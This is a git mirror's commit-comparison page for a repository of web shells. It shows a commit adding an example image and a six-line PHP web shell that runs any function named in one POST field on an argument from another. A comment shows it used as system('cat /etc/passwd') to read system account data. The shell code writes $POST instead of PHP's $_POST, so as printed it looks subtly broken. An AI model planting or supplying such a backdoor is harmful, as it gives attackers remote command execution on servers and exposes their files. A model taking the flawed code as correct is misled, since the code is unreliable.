mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 04:41:28 +00:00
Compare commits
2 Commits
d31dd250f0
...
39cf8cacca
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
39cf8cacca | ||
|
|
95f12107a7 |
BIN
php/Fig4-web-shell-example-2.png
Normal file
BIN
php/Fig4-web-shell-example-2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 100 KiB |
6
php/simple_2022_08_15.php
Normal file
6
php/simple_2022_08_15.php
Normal file
@@ -0,0 +1,6 @@
|
|||||||
|
<?php
|
||||||
|
$_=$POST['1'];
|
||||||
|
$__=$POST['2'];
|
||||||
|
// running -> system('cat /etc/passwd');
|
||||||
|
$_($__);
|
||||||
|
?>
|
||||||
Reference in New Issue
Block a user